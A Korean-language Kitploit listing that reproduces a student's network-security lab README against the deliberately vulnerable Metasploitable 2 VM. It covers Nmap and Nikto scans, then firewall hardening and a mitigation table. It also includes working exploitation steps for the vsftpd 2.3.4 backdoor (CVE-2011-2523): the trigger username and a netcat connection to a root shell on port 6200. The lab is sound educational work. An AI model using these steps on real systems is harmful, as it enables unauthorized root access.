Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
network-security-lab — 제어된 가상 공격 및 방어 연구실 — Metasploitable 2에서의 CVE-2011-2523 익스플로잇, Nmap 정찰, Nikto 스캐닝, UFW 강화 | Kitploit
도구/GitHubGitHub/amirmuhammadmarvi/network-security-lab
ReconnaissanceVulnerability ScannersVulnerability AnalysisExploitationConfiguration AuditingWeb SecurityNetwork SecurityPenetration TestingLearning & Education

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Labs & Practice
GitHubamirmuhammadmarvi/network-security-lab

network-security-lab

제어된 가상 공격 및 방어 연구실 — Metasploitable 2에서의 CVE-2011-2523 익스플로잇, Nmap 정찰, Nikto 스캐닝, UFW 강화

저장소 보기
2개월 전아직 검토되지 않음

🔬 네트워크 보안 랩

실제 공격 및 방어 시나리오를 시뮬레이션하는 통제된 가상 환경

Python Platform CVE Status


📋 개요

이 랩은 완전히 격리된 가상 환경에서 실제 침투 테스트 및 방어 강화 연습을 시뮬레이션합니다. 정찰부터 익스플로잇까지의 전체 공격 보안 수명 주기와 각 위험을 완화할 방어 제어를 보여줍니다.

주요 결과: 자격 증명이나 특별한 도구 없이 알려진 백도어를 이용하여 60초 이내에 대상 머신에서 전체 루트 액세스 권한을 획득했습니다.


🏗 랩 환경

구성 요소세부 사항
HypervisorVMware Workstation
NetworkHost-Only / NAT (fully isolated)
Attacker OSUbuntu 24 LTS
Target OSMetasploitable 2 (Linux 2.6.x)
Attacker IP192.168.148.255
Target IP192.168.148.130

🎯 방법론

root@kitploit:~
Reconnaissance  →  Scanning  →  Exploitation  →  Defense & Hardening

🔍 1단계 — 정찰

Nmap을 사용한 포트 스캔

root@kitploit:~
sudo nmap -sV -O 192.168.148.130 -oN scan_before.txt

주요 발견 사항 — 총 23개의 열린 포트:

Nikto를 사용한 웹 스캔

root@kitploit:~
nikto -h http://192.168.148.130 -o nikto_before.txt

18개의 취약점 발견, 포함 사항:

  • phpMyAdmin이 공개적으로 노출됨
  • phpinfo.php가 전체 서버 구성을 누출
  • HTTP TRACE 활성화됨 (XST 공격)
  • /doc/, /test/에서 디렉터리 인덱싱 활성화됨
  • 구버전 Apache 2.2.8 및 PHP 5.2.4

💥 2단계 — 익스플로잇

CVE-2011-2523 — vsftpd 2.3.4 백도어

vsftpd 2.3.4에는 공급망 손상을 통해 도입된 백도어가 포함되어 있습니다. :)로 끝나는 사용자 이름을 보내면 서버가 포트 6200에서 루트 셸을 엽니다.

root@kitploit:~
# Step 1 — FTP를 통해 백도어 트리거
ftp 192.168.148.130
# Username: backdoor:)   Password: anything

# Step 2 — 생성된 셸에 연결
nc 192.168.148.130 6200

# Step 3 — 액세스 확인
whoami
# → root

결과: 60초 미만에 전체 루트 수준 시스템 액세스 권한 획득 — 자격 증명이나 익스플로잇 프레임워크 불필요.

영향: 루트 액세스 권한을 가진 공격자는 모든 파일을 읽기/수정/삭제하고, 악성코드를 설치하고, 데이터를 유출하거나 네트워크의 다른 호스트로 피벗할 수 있습니다.


🛡 3단계 — 방어 및 강화

UFW 방화벽 — 기본 차단 정책

root@kitploit:~
sudo ufw enable
sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw allow 22/tcp    # SSH only
sudo ufw status verbose

권장되는 완화 조치


📄 전체 보고서

전체 평가 — 전체 방법론, 명령 출력, 발견 사항 표, 익스플로잇 단계 및 모든 완화 권장 사항은 report.md를 참조하세요.


⚠️ 법적 고지

이 랩은 의도적으로 취약한 소프트웨어(Metasploitable 2)를 사용하여 완전히 격리된 가상 환경에서 수행되었습니다. 모든 기술은 교육 및 포트폴리오 목적으로만 사용됩니다. 소유하지 않거나 명시적인 서면 허가 없이 테스트하는 시스템에서는 재현하지 마십시오.


🛠 사용된 도구


저자: Amir Mohammad Marwi

Portfolio LinkedIn GitHub

도구 다운로드
포트서비스버전위험
21FTPvsftpd 2.3.4🔴 심각 — 알려진 백도어 (CVE-2011-2523)
22SSHOpenSSH 4.7p1🟡 중간 — 구버전
23TelnetLinux telnetd🟠 높음 — 평문 프로토콜
80HTTPApache 2.2.8🟠 높음 — 다중 CVE
1524BindshellRoot shell🔴 심각 — 열린 루트 셸
3306MySQL5.0.51a🟠 높음 — 데이터베이스 노출
5900VNCProtocol 3.3🟠 높음 — 약한 인증
6667IRCUnrealIRCd🔴 심각 — 알려진 백도어
취약점해결 방법
vsftpd 2.3.4 백도어vsftpd 3.x로 업그레이드하거나 SFTP로 마이그레이션
열린 루트 셸 (포트 1524)즉시 비활성화, 설치 감사 수행
Telnet (포트 23)비활성화 — SSH만 적용
phpMyAdmin 노출IP로 제한, 강력한 인증 필요
MySQL 노출 (포트 3306)localhost에 바인딩, 외부 액세스 차단
VNC 노출 (포트 5900)IP로 제한하거나 비활성화
디렉터리 인덱싱Apache: Options -Indexes
HTTP TRACEApache: TraceEnable off
구버전 Apache + PHP지원되는 LTS 버전으로 업그레이드
도구
목적
Nmap포트 스캔 및 서비스 탐지
Nikto웹 취약점 스캔
Netcat백도어 셸 연결
UFW호스트 기반 방화벽 구성
FTP 클라이언트vsftpd 백도어 트리거
VMware Workstation랩 가상화